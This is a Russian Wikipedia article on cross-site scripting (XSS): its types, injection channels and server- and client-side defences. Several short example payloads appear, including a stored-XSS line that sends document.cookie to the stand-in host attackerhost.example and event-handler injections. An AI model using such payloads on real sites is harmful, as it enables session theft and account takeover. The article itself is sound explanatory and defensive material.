Межсайтовый скриптинг

XSS (англ. Cross-Site Scripting — «межсайтовый скриптинг») — подтип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника. Является разновидностью атаки «Внедрение кода».

Специфика подобных атак заключается в том, что вредоносный код может использовать авторизацию пользователя в веб-системе для получения к ней расширенного доступа или для получения авторизационных данных пользователя. Вредоносный код может быть вставлен в страницу как через уязвимость в веб-сервере, так и через уязвимость на компьютере пользователя^[1].

Для термина используют сокращение «XSS», чтобы не было путаницы с каскадными таблицами стилей, использующими сокращение «CSS».

XSS находится на третьем месте в рейтинге ключевых рисков Web-приложений, согласно OWASP 2021^[2]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора или номера платёжных документов), а там, где нет защиты от CSRF, атакующий может выполнить любые действия, доступные пользователю. Межсайтовый скриптинг может быть использован для проведения DoS-атаки^[3].

Справочная информация

Безопасность в Интернете обеспечивается с помощью многих механизмов, в том числе важной концепцией, известной как правило ограничения домена. Это правило разрешает сценариям, находящимся на страницах одного сайта (https://mybank.example.com), доступ к методам и свойствам друг друга без ограничений, но предотвращает доступ к большинству методов и свойств для страниц другого сайта (https://othersite.example.com)^[4].

Межсайтовый скриптинг использует известные уязвимости в web-приложениях, серверах (или в системных плагинах, относящихся к ним). Используя одну из них, злоумышленник встраивает вредоносный контент в содержание уже взломанного сайта. В результате пользователь получает объединенный контент в веб-браузере, который был доставлен из надежного источника, и, таким образом, действует в соответствии с разрешениями, предоставленными для этой системы. Сумев внедрить необходимый скрипт в веб-страницу, злоумышленник может получить повышенные привилегии в отношении работы с веб-страницами, cookies и другой информацией, хранящейся в браузере для данного пользователя.

Выражение «межсайтинговый скриптинг» первоначально означало взаимодействие уязвимого веб-приложения с сайтом злоумышленника таким образом, чтобы в контексте атакуемого домена был выполнен JavaScript-код, подготовленный злоумышленником (отражённая или хранимая XSS уязвимость). Постепенно определение стало включать в себя и другие способы внедрения кода, включая использование устойчивых и не относящихся к JavaScript языков (например, ActiveX, Java, VBScript, Flash и даже HTML), создавая путаницу среди новичков в сфере информационной безопасности.^[5]

XSS уязвимости зарегистрированы и используются с середины 1990-x годов^[6]. Известные сайты, пострадавшие в прошлом, включают такие сайты социальных сетей, как Twitter^[7], ВКонтакте^[8], MySpace^[9], YouTube^[10], Facebook^[11] и др.

Классификация

Не существует чёткой классификации межсайтового скриптинга. Но большинство экспертов различает по крайней мере два типа XSS: «отраженные» («reflected XSS» или «Type 1») и «хранимые» («stored XSS» или «Type 2»).

По местоположению вредоносного скрипта

Отражённые (непостоянные)

Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой^[13]. Это значит, вредоносный скрипт хранится в само́м запросе, и по ошибке появляется на веб-странице без надлежащей обработки^[14]. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.

Пример:

http://example.com/search.php?q=<script>DoSomething();script>

Если сайт не экранирует угловые скобки, преобразуя их в «<» и «>», получим скрипт на странице результатов поиска.

Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим для вектора XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.

Хранимые (постоянные)

Хранимый XSS является наиболее разрушительным типом атаки. Хранимый XSS возможен, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате без ограничений, а также другие сайты Веб 2.0 (блоги, вики, имиджборд), когда на сервере хранятся пользовательские тексты и рисунки. Скрипты вставляются в эти тексты и рисунки.

Фрагмент кода похищения ключа с идентификатором сессии (session ID):

<script>document.location="http://attackerhost.example/cgi-bin/cookiesteal.cgi?"+document.cookiescript>

DOM-модели

XSS в DOM-модели возникает на стороне клиента во время обработки данных внутри JavaScript-сценария. Данный тип XSS получил такое название, поскольку реализуется через DOM (Document Object Model) — не зависящий от платформы и языка программный интерфейс, позволяющий программам и сценариям получать доступ к содержимому HTML и XML-документов, а также изменять содержимое, структуру и оформление таких документов. При некорректной фильтрации возможно модифицировать DOM атакуемого сайта и добиться выполнения JavaScript-кода в контексте атакуемого сайта.

Пример:

<body><script>document.write(location.href);script>body>

Пример DOM-модели XSS — баг, найденный в 2011 году в нескольких JQuery-плагинах^[15]. Методы предотвращения DOM-модели XSS включают меры, характерные для традиционных XSS, но с реализацией на javascript и отправкой в веб-страницы — проверка ввода и предотвращение атаки^[16]. Некоторые фреймворки javascript имеют встроенные защитные механизмы от этих и других типов атак, например, AngularJS^[17].

По каналам внедрения скрипта

Ошибки в браузере

Из-за ошибок браузер может выполнять скрипты в SVG, нарушать правило Same Domain Policy. Это серьёзные ошибки; после обнаружения их быстро закрывают, однако в переходный период опасными становятся практически все сайты Веб 2.0: форумы, вики, имиджборды. Если такая ошибка обнаружилась, рекомендуется, пока не вышло обновление, пользоваться другим браузером.

Бывают и более тонкие ошибки, которые проявляются при очень специфичных условиях и крупного урона не наносят. Такие ошибки могут не исправляться годами и выгоднее исправить сайт, чем ждать обновления браузера.

Отсутствие экранирования спецсимволов HTML

Намного чаще встречаются ошибки на сайтах. Чтобы браузер гарантированно не принял строку за тег HTML, требуется заэкранировать пять символов: '"&<>. Сервер может экранировать не все символы (известный недостаток PHP^[22]), либо веб-программист просто забывает заэкранировать строку.

Обычно в базах данных текст хранится неэкранированным, и экранировать требуется все пользовательские строки каждый раз, когда они встраиваются в HTML: например, если не заэкранирован URL картинки, пользователь может ввести что-то наподобие http://example.com/img.png" onmouseover="javascript:DoSomething();.

Многие сайты позволяют форматирование текста с помощью какого-либо языка разметки (HTML, BBCode, вики-разметка). Часто не проводится полный лексический анализ языка разметки, а лишь преобразование в «безопасный» HTML с помощью регулярных выражений^[23]. Это упрощает программирование, однако требует досконального понимания, какими путями скрипт может проникнуть в результирующий HTML-код.

Отсутствие фильтрации атрибутов и их значений в разрешённых тегах

Типичным примером будет ссылка . Даже если форум позволяет внешние ссылки, не стоит пускать протоколы javascript: и data:.

Не являются XSS, но не менее вредны и другие атаки: хакер может указать в качестве адреса сервер, имеющий узкий интернет-канал, парализуя его работу большим количеством запросов, или устроить с его помощью XSRF-атаку.

Подмена кодировки в заголовке страницы

Современные браузеры пытаются определить кодировку страницы на ходу и интерпретируют html в соответствии с этой кодировкой. В случае, если тег </code> расположен до тега <code><meta></code> и заполняется пользовательскими данными, хакер может вставить злонамеренный html-код в кодировке <a href="//ru.wikipedia.org/wiki/UTF-7" title="UTF-7">UTF-7</a>, обойдя таким образом фильтрацию таких символов, как <code><</code> и <code>"</code>. Для защиты от данной уязвимости следует явно указывать кодировку страницы до каких-либо пользовательских полей. <a href="//ru.wikipedia.org/wiki/HTML_5" class="mw-redirect" title="HTML 5">HTML 5</a> прямо запрещает поддержку браузерами кодировки UTF-7 как потенциально опасной<a href="#cite_note-24">[24]</a>. <div class="mw-heading mw-heading4"><h4 id="Социальная_инженерия">Социальная инженерия</h4></div><div role="note" class="hatnote navigation-not-searchable noprint dabhide">В статье на другом языке есть более полный раздел <a href="https://en.wikipedia.org/wiki/Self-XSS" class="extiw" title="en:Self-XSS">Self-XSS</a> (англ.).</div>Пользуясь <a href="//ru.wikipedia.org/wiki/%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F_%D0%B8%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%8F" title="Социальная инженерия">социальной инженерией</a>, злоумышленники добиваются того, что пользователь сам запускает вредоносный скрипт в браузере (на стороне клиента). Разработчики браузеров и веб-сайты принимают усилия по предотвращению атак такого типа<a href="#cite_note-25">[25]</a>. <div class="mw-heading mw-heading4"><h4 id="Через_внедрение_SQL-кода">Через внедрение SQL-кода</h4></div><div role="note" class="hatnote navigation-not-searchable ts-main"><style data-mw-deduplicate="TemplateStyles:r142002967">.mw-parser-output .ts-main a{font-weight:bold}.mw-parser-output .ts-main a.new,.mw-parser-output .ts-main a.extiw,.mw-parser-output .ts-main a.external{font-weight:normal}</style>Основная статья: <a href="//ru.wikipedia.org/wiki/SiXSS" title="SiXSS">SiXSS</a></div>Если сайт и допускает <a href="//ru.wikipedia.org/wiki/%D0%92%D0%BD%D0%B5%D0%B4%D1%80%D0%B5%D0%BD%D0%B8%D0%B5_SQL-%D0%BA%D0%BE%D0%B4%D0%B0" title="Внедрение SQL-кода">внедрение SQL-кода</a>, и выводит содержимое БД без всякого экранирования (то ли по незнанию, то ли в БД хранится готовый HTML-код<a href="#cite_note-26">[26]</a>, то ли автор точно знает, что «плохих» символов в БД нет), можно провести необычную атаку. Внедрением SQL-кода записываем в БД «отравленную» страницу. Если кто-то получит доступ к этой строке БД, ему в браузер попадёт вредоносный скрипт. Бывают атаки и без хранения HTML в БД (отражённые) — <a href="//ru.wikipedia.org/wiki/%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0_%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F_%D0%B1%D0%B0%D0%B7%D0%B0%D0%BC%D0%B8_%D0%B4%D0%B0%D0%BD%D0%BD%D1%8B%D1%85" title="Система управления базами данных">СУБД</a> вместо хранящегося в БД поля вернёт тот скрипт, который записан в тексте запроса. <div class="mw-heading mw-heading3"><h3 id="По_способу_воздействия">По способу воздействия</h3></div><div role="note" class="hatnote navigation-not-searchable">Основной источник: <a href="#cite_note-27">[27]</a></div><div class="mw-heading mw-heading4"><h4 id="Активные">Активные</h4></div>Активная XSS атака не требует каких-либо действий со стороны пользователя с точки зрения функционала веб-приложения. Пример: <code><input type=text value=a onfocus=alert(1337) AUTOFOCUS></code>В данном примере показано поле ввода, у которого установлен обработчик события появления фокуса, выполняющий собственно код атаки, а также у данного поля ввода активировано свойство автоматической установки фокуса. Таким образом автоматически устанавливается фокус, что вызывает обработчик установки фокуса, содержащий код атаки. Атака является активной и выполняется автоматически, не требуя от пользователя никакой активности. <div class="mw-heading mw-heading4"><h4 id="Пассивные_(автономные)">Пассивные (автономные)</h4></div>Пассивная XSS-атака срабатывает при выполнении пользователем определённого действия (клик или наведение указателя мыши и т. п.). Пример: <code><a href='a' onmouseover=alert(1337) style='font-size:500px'></code>Пример показывает гиперссылку, особым образом привлекающую внимание пользователя, и/или занимающее значительное место, повышающее вероятность наведения указателя мыши, в данном случае крупным шрифтом. У гиперссылки установлен обработчик события наведения указателя мыши, содержащий код атаки. Атака является пассивной, так как бездействует, а код атаки не выполняется в ожидании наведения указателя мыши на ссылку пользователем. <div class="mw-heading mw-heading2"><h2 id="Средства_защиты">Средства защиты</h2></div><div role="note" class="hatnote navigation-not-searchable">Основной источник: <a href="#cite_note-multiple-1">[1]</a></div><div class="mw-heading mw-heading3"><h3 id="Защита_на_стороне_сервера">Защита на стороне сервера</h3></div><ul><li>Кодирование управляющих HTML-символов, JavaScript, CSS и <a href="//ru.wikipedia.org/wiki/URL" title="URL">URL</a> перед отображением в браузере. Для фильтрации входных параметров можно использовать следующие функции: <code>filter_sanitize_encoded</code> (для кодирования URL)<a href="#cite_note-28">[28]</a>, <code>htmlentities</code> (для фильтрации HTML)<a href="#cite_note-29">[29]</a>.</li><li>Кодирование входных данных. Например с помощью библиотек OWASP Encoding Project<a href="#cite_note-30">[30]</a>, HTML Purifier, htmLawed, Anti-XSS Class.</li><li>Регулярный ручной и автоматизированный анализ безопасности кода и тестирование на проникновение. С использованием таких инструментов, как <a href="//ru.wikipedia.org/wiki/Nessus" title="Nessus">Nessus</a>, <a href="https://en.wikipedia.org/wiki/en:Nikto_Web_Scanner" class="extiw" title="w:en:Nikto Web Scanner">Nikto Web Scanner</a> и <a href="https://en.wikipedia.org/wiki/en:OWASP_ZAP" class="extiw" title="w:en:OWASP ZAP">OWASP Zed Attack Proxy</a>.</li><li>Указание кодировки на каждой web-странице (например, <a href="//ru.wikipedia.org/wiki/ISO_8859-1" title="ISO 8859-1">ISO 8859-1</a> или <a href="//ru.wikipedia.org/wiki/UTF-8" title="UTF-8">UTF-8</a>) до каких-либо пользовательских полей<a href="#cite_note-31">[31]</a>.</li><li>Обеспечение безопасности <a href="//ru.wikipedia.org/wiki/HTTP_cookie" class="mw-redirect" title="HTTP cookie">cookies</a>, которая может быть реализована путём ограничения домена и пути для принимаемых cookies, установки параметра HttpOnly<a href="#cite_note-32">[32]</a>, использованием <a href="//ru.wikipedia.org/wiki/SSL" title="SSL">SSL</a><a href="#cite_note-33">[33]</a>.</li><li>Использование заголовка <a href="https://en.wikipedia.org/wiki/en:Content_Security_Policy" class="extiw" title="w:en:Content Security Policy">Content Security Policy</a>, позволяющего задавать список, в который заносятся желательные источники, с которых можно подгружать различные данные, например, JS, CSS, изображения и пр.</li></ul><div class="mw-heading mw-heading3"><h3 id="Защита_на_стороне_клиента">Защита на стороне клиента</h3></div><ul><li>Регулярное обновление браузера до новой версии<a href="#cite_note-browser-18">[18]</a>.</li><li>Установка расширений для браузера, которые будут проверять поля форм, URL, JavaScript и <a href="//ru.wikipedia.org/wiki/POST_(HTTP)" title="POST (HTTP)">POST</a>-запросы, и, если встречаются скрипты, применять XSS-фильтры для предотвращения их запуска. Примеры подобных расширений: <a href="//ru.wikipedia.org/wiki/NoScript" title="NoScript">NoScript</a> для <a href="//ru.wikipedia.org/wiki/FireFox" class="mw-redirect" title="FireFox">FireFox</a>, <a href="https://en.wikipedia.org/wiki/en:NotScripts" class="extiw" title="w:en:NotScripts">NotScripts</a> для <a href="//ru.wikipedia.org/wiki/Google_Chrome" title="Google Chrome">Chrome</a> и <a href="//ru.wikipedia.org/wiki/Opera" title="Opera">Opera</a>.</li></ul><div class="mw-heading mw-heading2"><h2 id="См._также">См. также</h2></div><ul><li><a href="//ru.wikipedia.org/wiki/CSRF" class="mw-redirect" title="CSRF">CSRF</a></li><li><a href="//ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D0%BE_%D0%BE%D0%B3%D1%80%D0%B0%D0%BD%D0%B8%D1%87%D0%B5%D0%BD%D0%B8%D1%8F_%D0%B4%D0%BE%D0%BC%D0%B5%D0%BD%D0%B0" title="Правило ограничения домена">Правило ограничения домена</a></li><li><a href="//ru.wikipedia.org/wiki/Metasploit" title="Metasploit">Metasploit</a></li><li><a href="//ru.wikipedia.org/wiki/%D0%92%D0%BD%D0%B5%D0%B4%D1%80%D0%B5%D0%BD%D0%B8%D0%B5_SQL-%D0%BA%D0%BE%D0%B4%D0%B0" title="Внедрение SQL-кода">Внедрение SQL-кода</a></li><li><a href="//ru.wikipedia.org/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5_%D1%81%D0%B8%D0%BC%D0%B2%D0%BE%D0%BB%D0%BE%D0%B2" title="Экранирование символов">Экранирование символов</a></li></ul><div class="mw-heading mw-heading2"><h2 id="Примечания">Примечания</h2></div><div class="reflist columns" style="list-style-type: decimal;"><div class="mw-references-wrap mw-references-columns"><ol class="references"><li id="cite_note-multiple-1">↑ <a href="#cite_ref-multiple_1-0">1</a><a href="#cite_ref-multiple_1-1">2</a>Jatana1, Nishtha, Agrawal, Adwiteeya, Sobti, Kritika.<a rel="nofollow" class="external text" href="http://www.exploit-db.com/wp-content/themes/exploit/docs/24559.pdf">Post XSS Exploitation: Advanced Attacks and Remedies</a> (недоступная ссылка — <a rel="nofollow" class="external text" href="//web.archive.org/web/*/http://www.exploit-db.com/wp-content/themes/exploit/docs/24559.pdf">история</a>) (англ.). — P. 9.</li><li id="cite_note-2"><a href="#cite_ref-2">↑</a><a rel="nofollow" class="external text" href="https://owasp.org/www-project-top-ten/">OWASP Top 10</a> (англ.). OWASP. The Open Web Application Security Project (OWASP). Дата обращения: 30 января 2022. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20200117090941/https://owasp.org/www-project-top-ten/">Архивировано</a> 17 января 2020 года.</li><li id="cite_note-_13b2a59e5ec26741-3"><a href="#cite_ref-_13b2a59e5ec26741_3-0">↑</a><a href="#CITEREFSeth_Fogie,_Jeremiah_Grossman2007">Seth Fogie, Jeremiah Grossman, 2007</a>, pp. 290, 379.</li><li id="cite_note-4"><a href="#cite_ref-4">↑</a><a rel="nofollow" class="external text" href="http://www.w3.org/Security/wiki/Same_Origin_Policy">Same Origin Policy</a> (англ.). W3C. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20170127073340/https://www.w3.org/Security/wiki/Same_Origin_Policy">Архивировано</a> 27 января 2017 года.</li><li id="cite_note-Grossman-5"><a href="#cite_ref-Grossman_5-0">↑</a>Grossman, Jeremiah.<a rel="nofollow" class="external text" href="http://jeremiahgrossman.blogspot.com/2006/07/origins-of-cross-site-scripting-xss.html">The origins of Cross-Site Scripting (XSS)</a> (англ.). Дата обращения: 15 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20170221201841/http://jeremiahgrossman.blogspot.com/2006/07/origins-of-cross-site-scripting-xss.html">Архивировано</a> 21 февраля 2017 года.</li><li id="cite_note-_a64fa50d63c9ed20-6"><a href="#cite_ref-_a64fa50d63c9ed20_6-0">↑</a><a href="#CITEREFSeth_Fogie,_Jeremiah_Grossman2007">Seth Fogie, Jeremiah Grossman, 2007</a>, p. 3.</li><li id="cite_note-7"><a href="#cite_ref-7">↑</a>Mirkov, Denis.<a rel="nofollow" class="external text" href="http://xakep.ru/53355/">Twitter заразили вирусом</a> . Хакер (21 сентября 2010). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218164234/http://xakep.ru/53355/">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-8"><a href="#cite_ref-8">↑</a>Mirkov, Denis.<a rel="nofollow" class="external text" href="http://xakep.ru/55008/">XSS-уязвимости ВКонтакте</a> . Хакер (10 марта 2011). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218171930/http://xakep.ru/55008/">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-9"><a href="#cite_ref-9">↑</a>Mirkov, Denis.<a rel="nofollow" class="external text" href="http://xakep.ru/34102/">Сайт Sla.ckers.org открыл подборку XSS уязвимостей</a> . Хакер (25 сентября 2006). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218172745/http://xakep.ru/34102/">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-10"><a href="#cite_ref-10">↑</a>Mirkov, Denis.<a rel="nofollow" class="external text" href="http://xakep.ru/44573/">Множественные уязвимости в YouTube Blog</a> . Хакер (23 июля 2008). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218174958/http://xakep.ru/44573/">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-11"><a href="#cite_ref-11">↑</a>Mirkov, Denis.<a rel="nofollow" class="external text" href="http://xakep.ru/43751/">На Facebook обнаружена XSS-уязвимость</a> . Хакер (26 мая 2008). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218175046/http://xakep.ru/43751/">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-12"><a href="#cite_ref-12">↑</a>Тюрин, Алексей.<a rel="nofollow" class="external text" href="http://habrahabr.ru/company/xakep/blog/189210/">В поисках лазеек: гид по DOM Based XSS</a> // Хакер : Журнал. — 2013. — № 172. — С. 80-85. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141215181636/http://habrahabr.ru/company/xakep/blog/189210/">Архивировано</a> 15 декабря 2014 года.</li><li id="cite_note-_4e3d5acb59046cd1-13"><a href="#cite_ref-_4e3d5acb59046cd1_13-0">↑</a><a href="#CITEREFPaco_Hope,_Ben_Walther2008">Paco Hope, Ben Walther, 2008</a>, p. 128.</li><li id="cite_note-14"><a href="#cite_ref-14">↑</a><a rel="nofollow" class="external text" href="http://projects.webappsec.org/Cross-Site-Scripting">Cross-site Scripting</a> (англ.). Web Application Security Consortium (2005). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20100601091306/http://projects.webappsec.org/Cross-Site-Scripting">Архивировано</a> 1 июня 2010 года.</li><li id="cite_note-15"><a href="#cite_ref-15">↑</a><a rel="nofollow" class="external text" href="http://bugs.jquery.com/ticket/9521">JQuery bug #9521</a> (англ.). JQuery. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20170130234617/https://bugs.jquery.com/ticket/9521">Архивировано</a> 30 января 2017 года.</li><li id="cite_note-16"><a href="#cite_ref-16">↑</a><a rel="nofollow" class="external text" href="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet">DOM based XSS prevention cheat sheet</a> (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20170128103628/https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet">Архивировано</a> 28 января 2017 года.</li><li id="cite_note-17"><a href="#cite_ref-17">↑</a><a rel="nofollow" class="external text" href="http://docs.angularjs.org/api/ng.$sce">Strict Contextual Escaping</a> (англ.). AngularJS. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20140210032643/http://docs.angularjs.org/api/ng.$sce">Архивировано</a> 10 февраля 2014 года.</li><li id="cite_note-browser-18">↑ <a href="#cite_ref-browser_18-0">1</a><a href="#cite_ref-browser_18-1">2</a><a rel="nofollow" class="external text" href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">Cross-site Scripting (XSS)</a> (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141222074747/https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29">Архивировано</a> 22 декабря 2014 года.</li><li id="cite_note-19"><a href="#cite_ref-19">↑</a><a rel="nofollow" class="external text" href="https://bugzilla.mozilla.org/show_bug.cgi?id=272620">Bug 272620 - XSS vulnerability in internal error messages</a> (англ.). Bugzilla@Mozilla. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141030023906/https://bugzilla.mozilla.org/show_bug.cgi?id=272620">Архивировано</a> 30 октября 2014 года.</li><li id="cite_note-20"><a href="#cite_ref-20">↑</a>US-CERT/NIST.<a rel="nofollow" class="external text" href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0902">Vulnerability Summary for CVE-2002-0902</a> (англ.) : сайт. — 2008. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20121015115726/http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0902">Архивировано</a> 15 октября 2012 года.</li><li id="cite_note-21"><a href="#cite_ref-21">↑</a>Boerwinkel, Martijn.<a rel="nofollow" class="external text" href="http://seclists.org/bugtraq/2002/May/243">Cross Site Scripting Vulnerability in phpBB2's IMG tag and remote avatar</a> (англ.). seclists.org (26 мая 2002). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218202759/http://seclists.org/bugtraq/2002/May/243">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-22"><a href="#cite_ref-22">↑</a>Стандартная функция <a href="//ru.wikipedia.org/wiki/PHP" title="PHP">PHP</a><code><a rel="nofollow" class="external text" href="http://php.su/functions/?htmlspecialchars">htmlspecialchars</a></code> по умолчанию не экранирует апостроф, и в сочетании с кодом <code>"<a href='$htUrl'>"</code> получается уязвимость.</li><li id="cite_note-23"><a href="#cite_ref-23">↑</a><a rel="nofollow" class="external text" href="http://dayte2.com/bbcode-function">Простой парсинг BBcode на php</a> . Веб-разработка. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141218203145/http://dayte2.com/bbcode-function">Архивировано</a> 18 декабря 2014 года.</li><li id="cite_note-24"><a href="#cite_ref-24">↑</a><a rel="nofollow" class="external text" href="https://html.spec.whatwg.org/multipage/semantics.html#charset">The elements of HTML — HTML Standard</a> (англ.). Web Hypertext Application Technology Working Group (WHATWG). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20191221150723/https://html.spec.whatwg.org/multipage/semantics.html#charset">Архивировано</a> 21 декабря 2019 года.</li><li id="cite_note-25"><a href="#cite_ref-25">↑</a><a rel="nofollow" class="external text" href="https://issues.chromium.org/issues/40078951">DevTools: Combat self-xss</a> (англ.). <a href="//ru.wikipedia.org/wiki/Chromium" title="Chromium">Chromium</a>. Дата обращения: 6 февраля 2024. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20240206193859/https://issues.chromium.org/issues/40078951">Архивировано</a> 6 февраля 2024 года.</li><li id="cite_note-26"><a href="#cite_ref-26">↑</a>Например, движок <a href="//ru.wikipedia.org/wiki/MediaWiki" title="MediaWiki">MediaWiki</a> кэширует HTML-код страниц.</li><li id="cite_note-27"><a href="#cite_ref-27">↑</a>Kochetkov, Vladimir.<a rel="nofollow" class="external text" href="http://www.securitylab.ru/analytics/428199.php">Вся правда об XSS или Почему межсайтовое выполнение сценариев не является уязвимостью?</a> SecurityLab (8 августа 2012). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141219005911/http://www.securitylab.ru/analytics/428199.php">Архивировано</a> 19 декабря 2014 года.</li><li id="cite_note-28"><a href="#cite_ref-28">↑</a><a rel="nofollow" class="external text" href="http://php.net/manual/ru/filter.filters.sanitize.php">Очищающие фильтры</a> . PHP. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141219043828/http://php.net/manual/ru/filter.filters.sanitize.php">Архивировано</a> 19 декабря 2014 года.</li><li id="cite_note-29"><a href="#cite_ref-29">↑</a><a rel="nofollow" class="external text" href="http://php.net/manual/ru/function.htmlentities.php">PHP:htmlentities</a> (англ.). PHP. Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141219012102/http://php.net/manual/ru/function.htmlentities.php">Архивировано</a> 19 декабря 2014 года.</li><li id="cite_note-30"><a href="#cite_ref-30">↑</a><a rel="nofollow" class="external text" href="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project">OWASP Java Encoder Project</a> . The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141102201501/https://www.owasp.org/index.php/OWASP_Java_Encoder_Project">Архивировано</a> 2 ноября 2014 года.</li><li id="cite_note-31"><a href="#cite_ref-31">↑</a>Сноу, Джон.<a rel="nofollow" class="external text" href="http://xakep.ru/53553/">Маскарад символов: unicode-ориентированные аспекты безопасности</a> // Хакер : сайт. — 2010. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141219042918/http://xakep.ru/53553/">Архивировано</a> 19 декабря 2014 года.</li><li id="cite_note-32"><a href="#cite_ref-32">↑</a><a rel="nofollow" class="external text" href="https://www.owasp.org/index.php/HttpOnly">HttpOnly</a> (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20081226095717/http://www.owasp.org/index.php/HTTPOnly">Архивировано</a> 26 декабря 2008 года.</li><li id="cite_note-33"><a href="#cite_ref-33">↑</a>Hafner, Robert.<a rel="nofollow" class="external text" href="http://blog.teamtreehouse.com/how-to-create-totally-secure-cookies">How to create totally secure cookies</a> (англ.) : сайт. — 2009. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20141219034744/http://blog.teamtreehouse.com/how-to-create-totally-secure-cookies">Архивировано</a> 19 декабря 2014 года.</li></ol></div></div><div class="mw-heading mw-heading2"><h2 id="Литература">Литература</h2></div><ul><li><style data-mw-deduplicate="TemplateStyles:r150646110">.mw-parser-output cite.citation{font-style:inherit;word-wrap:break-word}.mw-parser-output .citation q{quotes:"«""»""„""“"}.mw-parser-output .citation:target{background-color:rgba(0,127,255,0.133)}.mw-parser-output .id-lock-free a::after,.mw-parser-output .id-lock-limited a::after,.mw-parser-output .id-lock-registration a::after,.mw-parser-output .id-lock-subscription a::after,.mw-parser-output .cs1-ws-icon a::after{content:"";width:1.1em;height:1.1em;display:inline-block;vertical-align:middle;background-position:center;background-repeat:no-repeat;background-size:contain}.mw-parser-output .id-lock-free.id-lock-free a::after{background-image:url("//upload.wikimedia.org/wikipedia/commons/6/65/Lock-green.svg")}.mw-parser-output .id-lock-limited.id-lock-limited a::after,.mw-parser-output .id-lock-registration.id-lock-registration a::after{background-image:url("//upload.wikimedia.org/wikipedia/commons/d/d6/Lock-gray-alt-2.svg")}.mw-parser-output .id-lock-subscription.id-lock-subscription a::after{background-image:url("//upload.wikimedia.org/wikipedia/commons/a/aa/Lock-red-alt-2.svg")}.mw-parser-output .cs1-ws-icon a::after{background-image:url("//upload.wikimedia.org/wikipedia/commons/4/4c/Wikisource-logo.svg")}.mw-parser-output .cs1-code{color:inherit;background:inherit;border:none;padding:inherit}.mw-parser-output .cs1-hidden-error{display:none;color:var(--color-error,#d33)}.mw-parser-output .cs1-visible-error{color:var(--color-error,#d33)}.mw-parser-output .cs1-maint{display:none;color:#085;margin-left:0.3em}.mw-parser-output 